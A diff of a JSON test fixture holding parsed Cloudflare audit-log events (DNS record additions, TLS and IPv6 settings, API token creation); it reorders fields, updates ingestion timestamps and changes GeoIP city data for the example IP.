@@ -2848,6 +2848,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389092437Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7fb1c2e8-01fc-4fbf-977d-04bf96780ed0\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883214Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "7fb1c2e8-01fc-4fbf-977d-04bf96780ed0", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2875,21 +2890,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776197622Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7fb1c2e8-01fc-4fbf-977d-04bf96780ed0\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883214Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "7fb1c2e8-01fc-4fbf-977d-04bf96780ed0", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2917,14 +2917,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2936,6 +2936,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389092852Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"90dc929c-2e08-4a79-85ff-7120db4900fd\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883111Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "90dc929c-2e08-4a79-85ff-7120db4900fd", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2963,21 +2978,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776200244Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"90dc929c-2e08-4a79-85ff-7120db4900fd\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883111Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "90dc929c-2e08-4a79-85ff-7120db4900fd", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3005,14 +3005,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3024,6 +3024,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389093211Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"a9df3f63-7393-4d5f-b944-e26f14ff7004\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883012Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "a9df3f63-7393-4d5f-b944-e26f14ff7004", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3044,27 +3059,12 @@ "zone_name": "example.com", "id": "0032abba95117ec00ea9e80443ec4328", "proxied": false, - "priority": 5, - "type": "MX", - "ttl": 1, - "content": "gmr-smtp-in.l.google.com" - } - } - }, - "event": { - "ingested": "2021-12-13T14:40:20.776202851Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"a9df3f63-7393-4d5f-b944-e26f14ff7004\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883012Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "a9df3f63-7393-4d5f-b944-e26f14ff7004", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" + "priority": 5, + "type": "MX", + "ttl": 1, + "content": "gmr-smtp-in.l.google.com" + } + } }, "user": { "email": "user@example.com", @@ -3093,14 +3093,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3112,6 +3112,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389093582Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"56350016-6e66-4b42-9d33-decff087bb41\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"xClZppVPmuzSwaAIvasdffPmsr3hzfV0kd04M\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882912Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "56350016-6e66-4b42-9d33-decff087bb41", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3138,21 +3153,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776205498Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"56350016-6e66-4b42-9d33-decff087bb41\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"xClZppVPmuzSwaAIvasdffPmsr3hzfV0kd04M\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882912Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "56350016-6e66-4b42-9d33-decff087bb41", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3180,14 +3180,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3199,6 +3199,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389094025Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"39f4f90b-60f4-4448-92b2-50b92a6cdce2\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882783Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "39f4f90b-60f4-4448-92b2-50b92a6cdce2", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3225,21 +3240,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776208123Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"39f4f90b-60f4-4448-92b2-50b92a6cdce2\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882783Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "39f4f90b-60f4-4448-92b2-50b92a6cdce2", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3267,14 +3267,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3286,6 +3286,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389094395Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"6f53cfdd-79e2-4b11-9549-5701147985d8\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882594Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "6f53cfdd-79e2-4b11-9549-5701147985d8", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3312,21 +3327,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776210722Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"6f53cfdd-79e2-4b11-9549-5701147985d8\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882594Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "6f53cfdd-79e2-4b11-9549-5701147985d8", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3354,14 +3354,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3373,6 +3373,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389094769Z", + "original": "{\"action\":{\"result\":true,\"type\":\"pending\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"e84686bd-25b7-5b1a-9ef0-a41346d9335a\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:14:10Z\"}", + "provider": "UI", + "kind": "event", + "action": "pending", + "id": "e84686bd-25b7-5b1a-9ef0-a41346d9335a", + "type": [ + "info" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3391,21 +3406,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776213311Z", - "original": "{\"action\":{\"result\":true,\"type\":\"pending\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"e84686bd-25b7-5b1a-9ef0-a41346d9335a\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:14:10Z\"}", - "provider": "UI", - "kind": "event", - "action": "pending", - "id": "e84686bd-25b7-5b1a-9ef0-a41346d9335a", - "type": [ - "info" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -3428,7 +3428,7 @@ ] }, "event": { - "ingested": "2021-12-13T14:40:20.776216099Z", + "ingested": "2021-12-14T14:41:11.389095148Z", "original": "{\"action\":{\"result\":true,\"type\":\"tls_settings_deployed\"},\"actor\":{\"id\":\"1\",\"type\":\"system\"},\"id\":\"b657cc36-1919-4b4d-86f0-277bb05d479a\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"ciphers\":\"\",\"http_2\":\"Enabled\",\"min_tls_version\":\"TLSv1.0\",\"quic\":\"Default\",\"session_tickets\":\"Enabled\",\"tls_13\":\"Default\",\"zero_rtt\":\"Default\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-08-09T10:13:45.956041Z\"}", "kind": "event", "action": "tls_settings_deployed", @@ -3492,14 +3492,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3511,6 +3511,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389095522Z", + "original": "{\"action\":{\"result\":true,\"type\":\"add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"0704d600-dcea-5f07-82b5-08aef2cf22fe\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:13:42Z\"}", + "provider": "UI", + "kind": "event", + "action": "add", + "id": "0704d600-dcea-5f07-82b5-08aef2cf22fe", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3529,21 +3544,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776218846Z", - "original": "{\"action\":{\"result\":true,\"type\":\"add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"0704d600-dcea-5f07-82b5-08aef2cf22fe\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:13:42Z\"}", - "provider": "UI", - "kind": "event", - "action": "add", - "id": "0704d600-dcea-5f07-82b5-08aef2cf22fe", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -3571,14 +3571,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3590,6 +3590,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389095897Z", + "original": "{\"action\":{\"result\":true,\"type\":\"change_setting\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"557dd5f0-829e-5567-9007-e5c5aeba7393\",\"interface\":\"UI\",\"metadata\":{\"name\":\"IPv6\",\"type\":\"network\",\"value\":true,\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-08-09T10:13:42Z\"}", + "provider": "UI", + "kind": "event", + "action": "change_setting", + "id": "557dd5f0-829e-5567-9007-e5c5aeba7393", + "type": [ + "change" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3610,21 +3625,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776221467Z", - "original": "{\"action\":{\"result\":true,\"type\":\"change_setting\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"557dd5f0-829e-5567-9007-e5c5aeba7393\",\"interface\":\"UI\",\"metadata\":{\"name\":\"IPv6\",\"type\":\"network\",\"value\":true,\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-08-09T10:13:42Z\"}", - "provider": "UI", - "kind": "event", - "action": "change_setting", - "id": "557dd5f0-829e-5567-9007-e5c5aeba7393", - "type": [ - "change" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3652,14 +3652,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -3671,6 +3671,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389096271Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5f96da3a-5e9f-4660-b171-fc9c5555e429\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:06:47Z\"}", + "kind": "event", + "action": "token_create", + "id": "5f96da3a-5e9f-4660-b171-fc9c5555e429", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3689,20 +3703,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776224130Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5f96da3a-5e9f-4660-b171-fc9c5555e429\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:06:47Z\"}", - "kind": "event", - "action": "token_create", - "id": "5f96da3a-5e9f-4660-b171-fc9c5555e429", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
